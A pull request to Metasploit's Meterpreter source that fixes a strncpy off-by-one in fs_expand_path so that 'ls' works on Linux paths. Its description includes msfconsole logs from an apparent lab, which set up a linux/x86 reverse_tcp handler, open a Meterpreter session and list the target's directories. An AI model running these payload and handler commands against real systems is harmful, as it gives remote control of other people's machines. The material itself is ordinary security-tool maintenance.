### PR TITLE
Fix strncpy usage on linux fs_expand_path

### DIFF
--- a/source/extensions/stdapi/server/fs/fs_util.c
+++ b/source/extensions/stdapi/server/fs/fs_util.c
@@ -37,7 +37,8 @@ LPSTR fs_expand_path(LPCSTR regular)
 	char *expandedFilePath;
 	DWORD expandedFilePathSize = strlen(regular)+1;
 	expandedFilePath = malloc(expandedFilePathSize);
-	strncpy(expandedFilePath, regular, expandedFilePathSize - 1);
+	strncpy(expandedFilePath, regular, expandedFilePathSize);
+	expandedFilePath[expandedFilePathSize - 1] = '\0';
 	return expandedFilePath;
 #endif
 }


### PR DESCRIPTION
The `ls` command, on linux meterpreter, uses to fail when trying to `ls` existing directories. It's kinda easy to test, just get a linux meterpreter session and try to `ls` existing paths, errors will appear soon:

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 172.16.158.188
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.188:57506) at 2014-07-07 16:06:48 -0500

meterpreter > ls /tmp

Listing: /tmp
=============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
41777/rwxrwxrwx   4096   dir   2014-07-07 16:05:46 -0500  .
40755/rwxr-xr-x   4096   dir   2012-06-15 03:32:36 -0500  ..
41777/rwxrwxrwx   4096   dir   2014-07-07 12:39:03 -0500  .ICE-unix
100444/r--r--r--  11     fil   2014-07-07 12:38:42 -0500  .X0-lock
41777/rwxrwxrwx   4096   dir   2014-07-07 12:38:42 -0500  .X11-unix
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  .esd-1000
40700/rwx------   4096   dir   2014-07-07 12:39:23 -0500  .esd-114
41777/rwxrwxrwx   4096   dir   2014-07-07 12:38:42 -0500  VMwareDnD
140755/rwxr-xr-x  0      soc   2014-07-07 15:55:27 -0500  gedit.juan.2624675502
40755/rwxr-xr-x   4096   dir   2014-07-07 12:58:34 -0500  hsperfdata_juan
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  keyring-WyyW3b
100644/rw-r--r--  1907   fil   2014-07-07 14:16:14 -0500  meterpreter.crash.363
100755/rwxr-xr-x  155    fil   2014-07-07 12:47:03 -0500  meterpreter.elf
100644/rw-r--r--  43119  fil   2014-07-07 15:26:25 -0500  meterpreter.log.19892
100644/rw-r--r--  77255  fil   2014-07-07 15:24:22 -0500  meterpreter.log.31659
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  orbit-gdm
40700/rwx------   4096   dir   2014-07-07 15:55:27 -0500  orbit-juan
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  pulse-0F37gqxmCxrh
40700/rwx------   4096   dir   2014-07-07 12:39:23 -0500  pulse-PKdhtXMmr18n
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  ssh-SEhTRW1819
100755/rwxr-xr-x  7295   fil   2014-07-07 14:48:01 -0500  stat
100644/rw-r--r--  276    fil   2014-07-07 14:47:59 -0500  stat.c
40700/rwx------   4096   dir   2014-07-07 12:39:05 -0500  virtual-juan.OIfMaL
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  vmware-juan
40755/rwxr-xr-x   4096   dir   2014-07-07 12:38:43 -0500  vmware-root
40700/rwx------   4096   dir   2014-07-07 12:38:58 -0500  vmware-root-2722828970

meterpreter > ls /tmp/
[-] stdapi_fs_stat: Operation failed: 2
meterpreter > ls /home
[-] stdapi_fs_stat: Operation failed: 2
meterpreter > ls /home/
[-] stdapi_fs_stat: Operation failed: 2
meterpreter >
```

The problem comes from `fs_expand_path` on `fs_util.c`, where `strncpy` is used incorrectly, returning incorrect paths. It makes `request_fs_stat` and finally `request_fs_ls` fails.

This patch tries to solve the issues, after fixing `fs_expand_path` ls on **existing** paths should success:

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.158.188
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.188:57508) at 2014-07-07 16:10:33 -0500

meterpreter > ls /tmp

Listing: /tmp
=============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
41777/rwxrwxrwx   4096   dir   2014-07-07 16:08:13 -0500  .
40755/rwxr-xr-x   4096   dir   2012-06-15 03:32:36 -0500  ..
41777/rwxrwxrwx   4096   dir   2014-07-07 12:39:03 -0500  .ICE-unix
100444/r--r--r--  11     fil   2014-07-07 12:38:42 -0500  .X0-lock
41777/rwxrwxrwx   4096   dir   2014-07-07 12:38:42 -0500  .X11-unix
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  .esd-1000
40700/rwx------   4096   dir   2014-07-07 12:39:23 -0500  .esd-114
41777/rwxrwxrwx   4096   dir   2014-07-07 12:38:42 -0500  VMwareDnD
140755/rwxr-xr-x  0      soc   2014-07-07 15:55:27 -0500  gedit.juan.2624675502
40755/rwxr-xr-x   4096   dir   2014-07-07 12:58:34 -0500  hsperfdata_juan
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  keyring-WyyW3b
100644/rw-r--r--  1907   fil   2014-07-07 14:16:14 -0500  meterpreter.crash.363
100755/rwxr-xr-x  155    fil   2014-07-07 12:47:03 -0500  meterpreter.elf
100644/rw-r--r--  43119  fil   2014-07-07 15:26:25 -0500  meterpreter.log.19892
100644/rw-r--r--  77255  fil   2014-07-07 15:24:22 -0500  meterpreter.log.31659
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  orbit-gdm
40700/rwx------   4096   dir   2014-07-07 15:55:27 -0500  orbit-juan
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  pulse-0F37gqxmCxrh
40700/rwx------   4096   dir   2014-07-07 12:39:23 -0500  pulse-PKdhtXMmr18n
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  ssh-SEhTRW1819
100755/rwxr-xr-x  7295   fil   2014-07-07 14:48:01 -0500  stat
100644/rw-r--r--  276    fil   2014-07-07 14:47:59 -0500  stat.c
40700/rwx------   4096   dir   2014-07-07 12:39:05 -0500  virtual-juan.OIfMaL
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  vmware-juan
40755/rwxr-xr-x   4096   dir   2014-07-07 12:38:43 -0500  vmware-root
40700/rwx------   4096   dir   2014-07-07 12:38:58 -0500  vmware-root-2722828970

meterpreter > ls /tmp/

Listing: /tmp/
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
41777/rwxrwxrwx   4096   dir   2014-07-07 16:08:13 -0500  .
40755/rwxr-xr-x   4096   dir   2012-06-15 03:32:36 -0500  ..
41777/rwxrwxrwx   4096   dir   2014-07-07 12:39:03 -0500  .ICE-unix
100444/r--r--r--  11     fil   2014-07-07 12:38:42 -0500  .X0-lock
41777/rwxrwxrwx   4096   dir   2014-07-07 12:38:42 -0500  .X11-unix
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  .esd-1000
40700/rwx------   4096   dir   2014-07-07 12:39:23 -0500  .esd-114
41777/rwxrwxrwx   4096   dir   2014-07-07 12:38:42 -0500  VMwareDnD
140755/rwxr-xr-x  0      soc   2014-07-07 15:55:27 -0500  gedit.juan.2624675502
40755/rwxr-xr-x   4096   dir   2014-07-07 12:58:34 -0500  hsperfdata_juan
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  keyring-WyyW3b
100644/rw-r--r--  1907   fil   2014-07-07 14:16:14 -0500  meterpreter.crash.363
100755/rwxr-xr-x  155    fil   2014-07-07 12:47:03 -0500  meterpreter.elf
100644/rw-r--r--  43119  fil   2014-07-07 15:26:25 -0500  meterpreter.log.19892
100644/rw-r--r--  77255  fil   2014-07-07 15:24:22 -0500  meterpreter.log.31659
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  orbit-gdm
40700/rwx------   4096   dir   2014-07-07 15:55:27 -0500  orbit-juan
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  pulse-0F37gqxmCxrh
40700/rwx------   4096   dir   2014-07-07 12:39:23 -0500  pulse-PKdhtXMmr18n
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  ssh-SEhTRW1819
100755/rwxr-xr-x  7295   fil   2014-07-07 14:48:01 -0500  stat
100644/rw-r--r--  276    fil   2014-07-07 14:47:59 -0500  stat.c
40700/rwx------   4096   dir   2014-07-07 12:39:05 -0500  virtual-juan.OIfMaL
40700/rwx------   4096   dir   2014-07-07 12:39:03 -0500  vmware-juan
40755/rwxr-xr-x   4096   dir   2014-07-07 12:38:43 -0500  vmware-root
40700/rwx------   4096   dir   2014-07-07 12:38:58 -0500  vmware-root-2722828970

meterpreter > ls /home

Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2012-06-15 03:31:32 -0500  .
40755/rwxr-xr-x  4096  dir   2012-06-15 03:32:36 -0500  ..
40755/rwxr-xr-x  4096  dir   2014-07-07 16:04:32 -0500  juan

meterpreter > ls /home/

Listing: /home/
===============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2012-06-15 03:31:32 -0500  .
40755/rwxr-xr-x  4096  dir   2012-06-15 03:32:36 -0500  ..
40755/rwxr-xr-x  4096  dir   2014-07-07 16:04:32 -0500  juan

meterpreter >
```
